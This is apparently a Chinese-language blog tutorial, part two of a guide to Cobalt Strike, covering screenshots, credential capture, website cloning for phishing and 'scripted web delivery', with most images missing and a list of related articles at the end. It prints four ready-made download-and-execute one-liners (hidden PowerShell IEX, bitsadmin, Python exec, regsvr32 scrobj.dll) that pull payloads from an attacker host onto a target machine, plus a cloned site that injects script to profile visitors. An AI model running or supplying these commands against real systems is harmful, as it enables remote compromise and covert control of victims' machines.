cobaltstrike 常用功能使用(下)

简介: cobaltstrike 常用功能使用

4.6 屏幕截图

640.png

4.7 凭证信息

640.png

5. 钓鱼攻击

640.png

5.1 克隆网站

640.png

5.2 下载文件

选择一个恶意文件直接加载,下载的时候会下载该文件。

640.png

5.3 脚本web传递

5.3.1 powershell

640.png

生成的脚本如下

powershell.exe -nop -w hidden -c "IEX((new-objectnet.webclient).downloadstring('http://192.168.235.130:80/a'))"

直接在目标机器上执行该脚本

640.png

上线

640.png

5.3.2 bitsadmin

640.png

生成的脚本如下所示:

cmd.exe /c bitsadmin /transfer 5cc3 http://192.168.235.130:80/b %APPDATA%\5cc3.exe&%APPDATA%\5cc3.exe&del%APPDATA%\5cc3.exe

在目标机器上执行该脚本

640.png

上线

640.png

5.3.3 Python

640.png

生成的Payload如下:

python -c "import urllib2; exec urllib2.urlopen('http://192.168.235.130:80/c').read();"

在目标服务器上执行该脚本

640.png

5.3.4 Regsrv32

640.png

生成脚本如下:

regsvr32 /s /n /u /i:http://192.168.235.130:80/e scrobj.dll

5.4 信息收集

640.png

640.png

5.4.1 实践

直接访问http://192.168.235.130就可以收集主机相关信息

访问以后,收集到的信息如下所示:

640.png

5.4.2 原理

分析生成网站的源码发现,其在网站源代码里植入了JS脚本,相应脚本如下所示:

640.png

相关文章
|
安全 API 数据安全/隐私保护
Cobaltstrike4.0——记一次上头的powershell上线分析(三)
Cobaltstrike4.0——记一次上头的powershell上线分析
315 0
|
6月前
|
XML Java 程序员
|
8月前
|
网络协议 测试技术 Windows
Switchhosts工具的使用
Switchhosts工具的使用
236 0
|
网络协议 安全 Linux
windows系统开发常用cmd命令学习
在 cmd 命令中,按键盘的向上箭头可以快速切换历史前后命令,敲 Tab 可自动补全路径
141 0
|
XML 数据格式 Windows
太阳当空照-Windows服务化方式Winsw基本配置(上)
太阳当空照-Windows服务化方式Winsw基本配置
573 0
|
安全 数据可视化 API
太阳当空照-Windows服务化方式Winsw基本配置(下)
太阳当空照-Windows服务化方式Winsw基本配置(下)
437 0
|
安全 网络协议 Java
|
Java API C#
Cobaltstrike4.0——记一次上头的powershell上线分析(一)
Cobaltstrike4.0——记一次上头的powershell上线分析
623 0
|
存储 安全 API
Cobaltstrike4.0——记一次上头的powershell上线分析(二)
Cobaltstrike4.0——记一次上头的powershell上线分析
395 0
|
Unix Linux Shell
功能强大的远程终端神器MobaXterm
功能强大的远程终端神器MobaXterm
963 0